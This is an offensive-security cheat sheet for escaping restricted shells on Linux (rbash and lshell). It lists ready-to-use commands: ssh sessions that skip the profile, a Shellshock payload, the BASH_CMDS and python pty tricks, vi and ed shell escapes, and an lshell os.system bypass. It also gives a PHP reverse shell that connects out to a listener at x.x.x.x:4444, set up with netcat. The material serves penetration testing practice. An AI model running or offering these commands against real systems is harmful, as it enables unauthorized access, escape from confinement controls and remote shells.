Escape restricted shells

rbash

• rbash escape | rbash restricted shell escape
• Escape Restricted Shell Environments on Linux
• Escape from Restricted Shells

echo $SHELL

List available commands

compgen -c

List directory content without ls

echo /home/username/*

Remove bash profile

ssh username@x.x.x.x -t "bash --noprofile"

ssh username@x.x.x.x -t "/bin/sh"

Shellshock

ssh username@x.x.x.x -t "(){:;}; /bin/bash"

cannot specify `/’ in command names

BASH_CMDS[a]=/bin/sh;a
export PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

python -c 'import pty;pty.spawn("/bin/bash")'
export PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

vi

vi
:set shell=/bin/bash
:shell

ed

cd /home
echo $SHELL
ed
!'/bin/bash'
pwd

PHP

nc -lvp 4444

php -r '$sock=fsockopen("x.x.x.x",4444);exec("/bin/bash -i <&3 >&3 2>&3");'

Lshell (limited shell)

Limited Shell (lshell) is a python based shell that enables to restrict commands for users. See this page for other techniques.

help

cd  clear  echo  exit  help  history  ll  lpath  ls  lsudo

Bypass

echo os.system('/bin/bash')